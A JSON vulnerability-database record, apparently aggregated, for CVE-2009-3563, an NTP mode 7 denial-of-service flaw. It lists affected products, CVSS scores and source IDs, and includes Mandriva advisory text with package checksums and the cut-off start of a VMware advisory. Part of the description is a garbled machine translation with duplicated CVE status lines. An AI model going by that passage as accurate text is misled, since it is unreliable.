            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.3"
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 122",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms i64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.6"
          },
          {
            "_id": null,
            "model": "big-ip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.6"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 109",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.2.5"
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "digital media player",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 102",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "_id": null,
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 02",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified callmanager sr5b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "6.0-releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.2.2"
          },
          {
            "_id": null,
            "model": "4.2.0.a",
            "scope": null,
            "trust": 0.3,
            "vendor": "ntp",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 80",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 104",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ip interoperability \u0026 communications system ipics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "netra sparc t3-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 56",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 38",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "unified communications manager sr2b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "sparc t3-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 129",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rtos sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.3.0"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0(2)"
          },
          {
            "_id": null,
            "model": "intuity audix lx r1.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "beta4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "2.4"
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "intuity audix lx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.2.3.30"
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms i64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.7"
          },
          {
            "_id": null,
            "model": "7.2-release-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 84",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "intuity audix lx sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "ace application control engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "47000"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 98",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 117",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 133",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 58",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.2.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "nexus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50000"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 22",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 81",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 103",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "esxi server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "ctpos 6.6r1",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1(1)"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "_id": null,
            "model": "7.0-release-p11",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 13",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager 4.3 sr.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(1)"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0(1)"
          },
          {
            "_id": null,
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "p4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ntp",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 91",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager 7.0 su1",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(2)"
          },
          {
            "_id": null,
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 47",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 64",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.10"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 37",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 101",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager sr3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 115",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "linux armel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "intuity audix lx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "unified meetingplace",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.7"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 116",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 127",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "idp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "6.4-releng",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "unified callmanager 4.2 sr1",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "6.4-release-p5",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#568372"
          },
          {
            "db": "BID",
            "id": "37255"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200912-113"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002446"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3563"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Statement Date:\u00a0\u00a0 January 17, 2024",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#417980"
          }
        ],
        "trust": 0.8
      },
      "cve": "CVE-2009-3563",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.4,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2009-3563",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2009-3563",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2009-3563",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200912-113",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2009-3563",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2009-3563"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200912-113"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002446"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3563"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "ntp_request.c in ntpd in NTP before 4.2.4p8, and 4.2.5, allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by using MODE_PRIVATE to send a spoofed (1) request or (2) response packet that triggers a continuous exchange of MODE_PRIVATE error responses between two NTP daemons. A novel traffic-loop vulnerability has been identified against certain implementations of UDP-based applications protocols.  An unauthenticated attacker can use maliciously-crafted packets against a UDP-based vulnerable implementation of application protocols (e.g., DNS, NTP, TFTP) that can lead to Denial-of-Service (DOS) and/or abuse of resources.CVE-2009-3563 Unknown\nCVE-2024-1309 Unknown\nCVE-2024-2169 AffectedCVE-2009-3563 Unknown\nCVE-2024-1309 Unknown\nCVE-2024-2169 Affected. NTP for, mode 7 A vulnerability exists due to packet processing. NTP Then \"restrict ... noquery\" or \"restrict ... ignore\" There are no restrictions due to the settings of IP From the address, an invalid mode 7 request or mode 7 If you receive an error response, mode 7 Returns and logs the error message. NTP The sender address was spoofed. mode 7 A vulnerability exists due to packet processing.Service operation obstruction by a remote third party (DoS) You may be attacked. NTP is prone to a remote denial-of-service vulnerability because it fails to properly handle certain incoming network packets. \nAn attacker can exploit this issue to cause the application to consume excessive CPU resources and fill disk space with log messages. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2008.0:\n 7377623e9f89c5f6f6cc7af577974458  2008.0/i586/ntp-4.2.4-10.3mdv2008.0.i586.rpm\n 977fdaf289c9eff53fb6d563b8a60ede  2008.0/i586/ntp-client-4.2.4-10.3mdv2008.0.i586.rpm\n e2701dc192a578b141f9408d355522b6  2008.0/i586/ntp-doc-4.2.4-10.3mdv2008.0.i586.rpm \n 167e3a9dbf1bd10fd576e6a91a2cbc10  2008.0/SRPMS/ntp-4.2.4-10.3mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 4fa28ef04548ded3dc604ea61a671cc5  2008.0/x86_64/ntp-4.2.4-10.3mdv2008.0.x86_64.rpm\n b79353be7c2da1fadf3bc55c2c06a6a6  2008.0/x86_64/ntp-client-4.2.4-10.3mdv2008.0.x86_64.rpm\n c93dd45fc32ece044874c09aac85ce66  2008.0/x86_64/ntp-doc-4.2.4-10.3mdv2008.0.x86_64.rpm \n 167e3a9dbf1bd10fd576e6a91a2cbc10  2008.0/SRPMS/ntp-4.2.4-10.3mdv2008.0.src.rpm\n\n Mandriva Linux 2009.0:\n 6a38837b845970b62520f48273362485  2009.0/i586/ntp-4.2.4-18.5mdv2009.0.i586.rpm\n 4f9d98a186c4ca4348f8296fde0bf174  2009.0/i586/ntp-client-4.2.4-18.5mdv2009.0.i586.rpm\n 0ae26de5f1bddba4c2718a55463d94b7  2009.0/i586/ntp-doc-4.2.4-18.5mdv2009.0.i586.rpm \n 45b55bdbde84289b20e295b9dbf188fb  2009.0/SRPMS/ntp-4.2.4-18.5mdv2009.0.src.rpm\n\n Mandriva Linux 2009.0/X86_64:\n e31f3f71e730e5777d9832cd76430b17  2009.0/x86_64/ntp-4.2.4-18.5mdv2009.0.x86_64.rpm\n 67a998da616d287fe9e15092bbd45ff6  2009.0/x86_64/ntp-client-4.2.4-18.5mdv2009.0.x86_64.rpm\n ab02dd7a3457f0ba75248390827c69a4  2009.0/x86_64/ntp-doc-4.2.4-18.5mdv2009.0.x86_64.rpm \n 45b55bdbde84289b20e295b9dbf188fb  2009.0/SRPMS/ntp-4.2.4-18.5mdv2009.0.src.rpm\n\n Mandriva Linux 2009.1:\n b6597f0ee96ec99c7ddbe5e18a588e48  2009.1/i586/ntp-4.2.4-22.3mdv2009.1.i586.rpm\n 069667f851886c39daa0309a5e920619  2009.1/i586/ntp-client-4.2.4-22.3mdv2009.1.i586.rpm\n 9d5b87f008f00ad30b3c652e5f62eea2  2009.1/i586/ntp-doc-4.2.4-22.3mdv2009.1.i586.rpm \n e2686dd1237f529bb08f2837052fb46f  2009.1/SRPMS/ntp-4.2.4-22.3mdv2009.1.src.rpm\n\n Mandriva Linux 2009.1/X86_64:\n e88121b38c942c572b61ba7631130104  2009.1/x86_64/ntp-4.2.4-22.3mdv2009.1.x86_64.rpm\n c10eaf7ecbeb3b5db5eac978cb2ae78e  2009.1/x86_64/ntp-client-4.2.4-22.3mdv2009.1.x86_64.rpm\n 8ff34e79ed1f88fa2e7b7e8030232a30  2009.1/x86_64/ntp-doc-4.2.4-22.3mdv2009.1.x86_64.rpm \n e2686dd1237f529bb08f2837052fb46f  2009.1/SRPMS/ntp-4.2.4-22.3mdv2009.1.src.rpm\n\n Mandriva Linux 2010.0:\n 2913258a9be65654a3ce5e16c1bd5b25  2010.0/i586/ntp-4.2.4-27.1mdv2010.0.i586.rpm\n 90cf8d7f8fb468461f8b8baf7d97daa4  2010.0/i586/ntp-client-4.2.4-27.1mdv2010.0.i586.rpm\n 0b8527559ef05049461cea2f5a83bd6d  2010.0/i586/ntp-doc-4.2.4-27.1mdv2010.0.i586.rpm \n 7bbd4271086ace434dd8a958bc7c2488  2010.0/SRPMS/ntp-4.2.4-27.1mdv2010.0.src.rpm\n\n Mandriva Linux 2010.0/X86_64:\n 2e938e58d48f3f581ffaab085dacc1f2  2010.0/x86_64/ntp-4.2.4-27.1mdv2010.0.x86_64.rpm\n cde3421867c549169751f2964420a578  2010.0/x86_64/ntp-client-4.2.4-27.1mdv2010.0.x86_64.rpm\n d9799e7286a49420699d3995e8bc1e47  2010.0/x86_64/ntp-doc-4.2.4-27.1mdv2010.0.x86_64.rpm \n 7bbd4271086ace434dd8a958bc7c2488  2010.0/SRPMS/ntp-4.2.4-27.1mdv2010.0.src.rpm\n\n Corporate 3.0:\n 65dda36544e7a43175abfd64aa725b34  corporate/3.0/i586/ntp-4.2.0-2.4.C30mdk.i586.rpm \n a485cad0631598335af0e89ea399ff9d  corporate/3.0/SRPMS/ntp-4.2.0-2.4.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 44130a38552f20b3f34d176c47aa5aab  corporate/3.0/x86_64/ntp-4.2.0-2.4.C30mdk.x86_64.rpm \n a485cad0631598335af0e89ea399ff9d  corporate/3.0/SRPMS/ntp-4.2.0-2.4.C30mdk.src.rpm\n\n Corporate 4.0:\n a2f5a598865d390f7c537fc9e1a9a758  corporate/4.0/i586/ntp-4.2.0-21.7.20060mlcs4.i586.rpm\n f7eb3884bc0aa71f8237d9500d24489e  corporate/4.0/i586/ntp-client-4.2.0-21.7.20060mlcs4.i586.rpm \n d2ed46d981570f66763f85c822b14179  corporate/4.0/SRPMS/ntp-4.2.0-21.7.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n 1bd4395c9c80b583bad4ce5085c0d557  corporate/4.0/x86_64/ntp-4.2.0-21.7.20060mlcs4.x86_64.rpm\n 95f812f672cf79fccee411154c23d6ee  corporate/4.0/x86_64/ntp-client-4.2.0-21.7.20060mlcs4.x86_64.rpm \n d2ed46d981570f66763f85c822b14179  corporate/4.0/SRPMS/ntp-4.2.0-21.7.20060mlcs4.src.rpm\n\n Mandriva Enterprise Server 5:\n 16e3975f3e4bb9a830eb1e8166f2fec7  mes5/i586/ntp-4.2.4-18.5mdvmes5.i586.rpm\n 2af9623d6f3685d54dd4db31f9622f7a  mes5/i586/ntp-client-4.2.4-18.5mdvmes5.i586.rpm\n 5abb771d456b4094d123c5cf24701aee  mes5/i586/ntp-doc-4.2.4-18.5mdvmes5.i586.rpm \n 086a05988392a6602c023f4e453bcc32  mes5/SRPMS/ntp-4.2.4-18.5mdvmes5.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 9b40b186bf9ebeb70c1350f9a158ac92  mes5/x86_64/ntp-4.2.4-18.5mdvmes5.x86_64.rpm\n f4a42229dc9b408b04f0c83aa3a25720  mes5/x86_64/ntp-client-4.2.4-18.5mdvmes5.x86_64.rpm\n 2022447e5d9dbf6ee1a6e594935b1d04  mes5/x86_64/ntp-doc-4.2.4-18.5mdvmes5.x86_64.rpm \n 086a05988392a6602c023f4e453bcc32  mes5/SRPMS/ntp-4.2.4-18.5mdvmes5.src.rpm\n\n Multi Network Firewall 2.0:\n 56a2596fd513295f0700508c08a6a3da  mnf/2.0/i586/ntp-4.2.0-2.4.C30mdk.i586.rpm \n f8218643f02c3168e0331852630835a0  mnf/2.0/SRPMS/ntp-4.2.0-2.4.C30mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niD8DBQFLHtsAmqjQ0CJFipgRAi1pAKDUH87qI312n3XHGnl4TgVNC+IuvACbBhUw\nnLO5FqSyfvZaqSNZ93vTSUw=\n=XCg1\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2010-0004\nSynopsis:          ESX Service Console and vMA third party updates\nIssue date:        2010-03-03\nUpdated on:        2010-03-03 (initial release of advisory)\nCVE numbers:       CVE-2009-2905 CVE-2008-4552 CVE-2008-4316\n                   CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n                   CVE-2009-1386 CVE-2009-1387 